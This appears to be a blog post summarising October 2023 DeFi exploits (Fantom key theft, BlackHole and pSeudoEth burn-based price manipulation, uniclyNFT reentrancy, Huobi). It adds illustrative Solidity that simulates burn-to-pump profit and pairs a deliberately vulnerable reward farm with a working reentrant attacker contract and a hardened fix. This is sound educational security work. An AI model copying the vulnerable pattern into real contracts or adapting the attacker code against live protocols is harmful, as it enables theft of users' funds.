October 25, 2023

Fantom, BlackHole, uniclyNFT: Keys, Burns, and Reentrancy All Over Again

October 2023 saw more déjà vu in Web3 security. A Fantom employee’s hot wallets were drained across chains for $7M. BlackHole and pSeudoEth repeated the burn-to-pump playbook. And uniclyNFT fell to another stale-reward reentrancy bug. These weren’t new attack types — they were unresolved patterns. Each one signals the same thing: most exploits are replays, not revelations.

In Brief

  • Fantom Foundation lost $7M due to a private key compromise.
  • BlackHole hacked for over $1.3M.
  • pSeudoEth got exploited due to price manipulation.
  • uniclyNFT suffered a reentrancy attack.

Hacks Analysis

Fantom Foundation | Amount Lost: $7M

On October 17th, the Fantom Foundation exploit on multiple chains resulted in a $7 million loss due to the compromise of private keys. The attacker created two malicious contracts and drained wallets 1, 16, 19, and 20, all belonging to a Fantom employee, on Ethereum Mainnet, Fantom, and BNB Chain. The Fantom Foundation has acknowledged the $7,078,184 hack and clarified that these wallets belonged to an employee rather than to the organization itself.

Exploit Contract (Hot Wallet): 0x596288a9090c9eedf87bb5f2da5d8e1bbc7bb935

Transaction Hash: 0x799e6300bdef5733650f13a81513793654f7be4ea0408983c1cbec38ed6246f9

BlackHole | Amount Lost: $1.3M

On October 11th, the BlackHole exploit on the BNB chain resulted in a $1.3M loss due to a price manipulation vulnerability. The root cause was that the attacker was able to burn BH tokens, reducing the total supply and artificially inflating the token price. The attacker first borrowed 773,800 USDT through a flash loan and swapped it for BH tokens, then called the burn() function to reduce the BH supply, and finally sold the BH tokens back at the inflated price, repaying the loan and keeping the difference.


Borrowed Token Contract (Binance-Peg BSC-USD, BNB Chain): 0x55d398326f99059fF775485246999027B3197955

Transaction Hash: 0xc11e4020c0830bcf84bfa197696d7bfad9ff503166337cb92ea3fade04007662

pSeudoEth | Amount Lost: $2.3K

On October 8th, the pSeudoEth exploit on the Ethereum Mainnet resulted in a $2.3K loss due to a price manipulation vulnerability. The attacker first borrowed 51,970 WETH from Balancer’s Vault and swapped it for pEth tokens, then invoked the pSeudoEth contract’s 0x387e() function, whose tax logic burned pEth tokens. The burn reduced the pEth supply and drove up the token’s price, and the attacker sold into that price for a profit before repaying the loan.


Exploit Contract: 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7

Transaction Hash: 0x4ab68b21799828a57ea99c1288036889b39bf85785240576e697ebff524b3930
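The BlackHole and pSeudoEth entries above describe the same playbook: flash loan, buy, burn, sell. What both summaries leave implicit is where the price comes from. On a constant-product pool the price is the ratio of the pair’s reserves, so a burn only moves it if it removes tokens the pair itself holds (directly, or through a tax applied on transfer) and the pair’s recorded reserves are then brought in line with its balance; burning tokens from your own wallet lowers totalSupply and changes nothing. The contract below is an added illustration written for this page, not BlackHole’s or pSeudoEth’s code. The PAIR address, the burnFrom() that can target the pair’s balance, and the Uniswap-V2-style sync() are assumptions made to show the mechanism, not details taken from either incident, and quote-asset balances are not tracked beyond the pair’s reserve. With reserves of 1,000,000 tokens and 1,000,000 quote units (both 18 decimals), burnToPump(500_000e18, 500_000e18) returns roughly 500,000e18 of profit, while burn() of the same amount from the caller’s own balance leaves spotPrice() exactly where it was.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration for this page, not BlackHole's or pSeudoEth's code. The
// pool is a constant-product pair (x * y = k) holding this token against a
// quote asset; PAIR, burnFrom() and sync() are assumptions made to show the
// mechanism, not details taken from either incident.
contract BurnToPumpSim {
    address public constant PAIR = address(0xBEEF); // constructed pool address

    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;

    uint256 public reserveToken; // pair's recorded reserve of this token
    uint256 public reserveUsd;   // pair's recorded reserve of the quote asset

    constructor(uint256 tokenReserve, uint256 usdReserve) {
        balanceOf[PAIR] = tokenReserve;
        totalSupply = tokenReserve;
        reserveToken = tokenReserve;
        reserveUsd = usdReserve;
    }

    // Quote per token, 18-decimal fixed point. A function of reserves only,
    // never of totalSupply.
    function spotPrice() public view returns (uint256) {
        return reserveUsd * 1e18 / reserveToken;
    }

    // Constant-product swap: quote in, token out (fees omitted).
    function buy(uint256 usdIn) public returns (uint256 tokensOut) {
        tokensOut = reserveToken * usdIn / (reserveUsd + usdIn);
        reserveUsd += usdIn;
        reserveToken -= tokensOut;
        balanceOf[PAIR] -= tokensOut;
        balanceOf[msg.sender] += tokensOut;
    }

    // Constant-product swap: token in, quote out (fees omitted).
    function sell(uint256 tokensIn) public returns (uint256 usdOut) {
        usdOut = reserveUsd * tokensIn / (reserveToken + tokensIn);
        balanceOf[msg.sender] -= tokensIn;
        balanceOf[PAIR] += tokensIn;
        reserveToken += tokensIn;
        reserveUsd -= usdOut;
    }

    // Burning your own tokens: totalSupply drops, reserves and spotPrice() do not move.
    function burn(uint256 amount) public { _burn(msg.sender, amount); }

    // The dangerous shape: a burn (or transfer tax) that can remove tokens the pair holds.
    function burnFrom(address from, uint256 amount) public { _burn(from, amount); }

    // Uniswap-V2-style sync: the recorded reserve follows the pair's actual balance.
    function sync() public { reserveToken = balanceOf[PAIR]; }

    function _burn(address from, uint256 amount) internal {
        balanceOf[from] -= amount; // reverts on underflow in 0.8
        totalSupply -= amount;
    }

    // The playbook in one call: swap (flash-loaned) quote into tokens, shrink the
    // pair's token reserve, sync, sell back. Returns the quote gained beyond usdIn,
    // i.e. what is left after repaying a fee-free flash loan.
    function burnToPump(uint256 usdIn, uint256 pairBurn) external returns (uint256 profit) {
        uint256 bought = buy(usdIn);
        burnFrom(PAIR, pairBurn); // burning from the caller's own balance instead leaves the price unchanged
        sync();
        uint256 usdOut = sell(bought);
        profit = usdOut > usdIn ? usdOut - usdIn : 0;
    }
}
```

The defence follows from the mechanism rather than from the word "burn": any burn or tax path that can reduce a liquidity pair’s balance without a swap is price-sensitive, so either restrict burns to the caller’s own balance, exclude pair addresses from tax and burn logic explicitly, or treat such functions as privileged.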

uniclyNFT | Amount Lost: $2K

On September 14th, the uniclyNFT exploit on the Ethereum Mainnet resulted in a $2K loss due to a reentrancy attack. The attacker began by depositing 3,528 uJENNY tokens into uniclyNFT’s PointFarm contract to accumulate rewards. Two days later, the attacker exploited the deposit() function: because user.rewardDebt was updated only after an external call, each re-entrant call computed the pending reward against the same stale debt, so the attacker minted the reward repeatedly without ever settling it. The attacker then used the rewards to purchase a LootRealms NFT and listed it for sale.


Exploit Contract: 0xd3C41c85bE295607E8EA5c58487eC5894300ee67

Transaction Hash: 0xc42fe1ce2516e125a386d198703b2422aa0190b25ef6a7b0a1d3c6f5d199ffad
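The stale-debt bug described above is a MasterChef-pattern mistake that does not need a custom token to trigger: it only needs the reward or stake token to hand control back to the depositor in the middle of deposit(). The code below is an added illustration for this page, not uniclyNFT’s PointFarm. It assumes a reward token whose mint() calls an onRewardMinted() hook on contract recipients (hypothetical interface names), assumes the attacker contract already holds and has approved stake tokens (the approval call is omitted), shows the vulnerable ordering next to the checks-effects-interactions fix with a reentrancy guard, and includes the attacker contract that re-enters deposit(0) from the hook. Against VulnerablePointFarm every nested call computes _owed() against the rewardDebt that the outermost call has not yet written, so five levels collect five times the pending reward; against HardenedPointFarm the nested call reverts with "reentrant", and even without the guard the already-updated rewardDebt would make the nested _owed() zero.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration for this page, not uniclyNFT's PointFarm. Assumed
// (hypothetical) interfaces: a stake token with a plain transferFrom, and a
// reward token whose mint() notifies contract recipients via onRewardMinted(),
// which is the re-entry point the attacker uses.
interface IStakeToken {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IRewardReceiver {
    function onRewardMinted(uint256 amount) external;
}

contract HookedRewardToken {
    mapping(address => uint256) public balanceOf;

    // Mock with no access control so the farm can mint; hands control to contract recipients.
    function mint(address to, uint256 amount) external {
        balanceOf[to] += amount;
        if (to.code.length > 0) IRewardReceiver(to).onRewardMinted(amount);
    }
}

abstract contract PointFarmBase {
    struct UserInfo { uint256 amount; uint256 rewardDebt; }

    IStakeToken public immutable stakeToken;
    HookedRewardToken public immutable rewardToken;
    uint256 public immutable rewardPerBlock;
    uint256 public accRewardPerShare; // reward per staked token, scaled by 1e12
    uint256 public lastRewardBlock;
    uint256 public totalStaked;
    mapping(address => UserInfo) public userInfo;

    constructor(IStakeToken s, HookedRewardToken r, uint256 rpb) {
        stakeToken = s; rewardToken = r; rewardPerBlock = rpb; lastRewardBlock = block.number;
    }

    function updatePool() public {
        if (block.number <= lastRewardBlock) return;
        if (totalStaked > 0) {
            accRewardPerShare += (block.number - lastRewardBlock) * rewardPerBlock * 1e12 / totalStaked;
        }
        lastRewardBlock = block.number;
    }

    // Pending reward = accrued share minus what has already been paid out (rewardDebt).
    function _owed(UserInfo storage u) internal view returns (uint256) {
        return u.amount * accRewardPerShare / 1e12 - u.rewardDebt;
    }

    function deposit(uint256 amount) external virtual;
}

// VULNERABLE: rewardDebt is written only after two external calls.
contract VulnerablePointFarm is PointFarmBase {
    constructor(IStakeToken s, HookedRewardToken r, uint256 rpb) PointFarmBase(s, r, rpb) {}

    function deposit(uint256 amount) external override {
        UserInfo storage user = userInfo[msg.sender];
        updatePool();
        if (user.amount > 0) rewardToken.mint(msg.sender, _owed(user)); // hook may re-enter deposit()
        if (amount > 0) require(stakeToken.transferFrom(msg.sender, address(this), amount), "transfer");
        user.amount += amount;
        totalStaked += amount;
        user.rewardDebt = user.amount * accRewardPerShare / 1e12; // too late: nested calls saw the stale debt
    }
}

// HARDENED: checks-effects-interactions order plus a reentrancy guard.
contract HardenedPointFarm is PointFarmBase {
    uint256 private locked = 1;
    modifier nonReentrant() { require(locked == 1, "reentrant"); locked = 2; _; locked = 1; }

    constructor(IStakeToken s, HookedRewardToken r, uint256 rpb) PointFarmBase(s, r, rpb) {}

    function deposit(uint256 amount) external override nonReentrant {
        UserInfo storage user = userInfo[msg.sender];
        updatePool();
        uint256 owed = user.amount > 0 ? _owed(user) : 0;
        user.amount += amount;                                    // effects first
        totalStaked += amount;
        user.rewardDebt = user.amount * accRewardPerShare / 1e12; // a re-entrant _owed() now reads 0
        if (amount > 0) require(stakeToken.transferFrom(msg.sender, address(this), amount), "transfer");
        if (owed > 0) rewardToken.mint(msg.sender, owed);         // interactions last
    }
}

// Attacker: stake once (after approving the farm on the stake token), let rewards
// accrue, then call drain(); the hook re-enters deposit(0) four more times and
// every level is paid the same stale _owed() amount.
contract ReenteringStaker is IRewardReceiver {
    VulnerablePointFarm public immutable farm;
    uint256 public depth;

    constructor(VulnerablePointFarm f) { farm = f; }

    function stake(uint256 amount) external { farm.deposit(amount); }

    function drain() external { depth = 0; farm.deposit(0); }

    function onRewardMinted(uint256) external override {
        if (msg.sender != address(farm.rewardToken())) return;
        if (depth++ < 4) farm.deposit(0); // five payouts of one pending reward in total
    }
}
```

The guard is the safety net, not the fix: the ordering change is what removes the bug, because once rewardDebt is written before any external call, a re-entrant deposit() has nothing left to claim. Reviewing a farm for this pattern means checking every deposit, withdraw and harvest path for a state write that happens after a token call, including plain ERC20 transfers to tokens that have hooks.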

Huobi  |  Amount Lost: $8M

On September 24th, the Huobi Global exploit on the Ethereum Mainnet resulted in an $8 million loss due to the compromise of private keys. The attacker executed the attack in a single transaction by sending 4,999 ETH to a malicious contract, then created a second malicious contract and transferred 1,001 ETH to it. Huobi has since confirmed that it has identified the attacker and has offered a 5% white hat bounty if the funds are returned to the exchange.

Exploit Contract: 0x2abc22eb9a09ebbe7b41737ccde147f586efeb6a
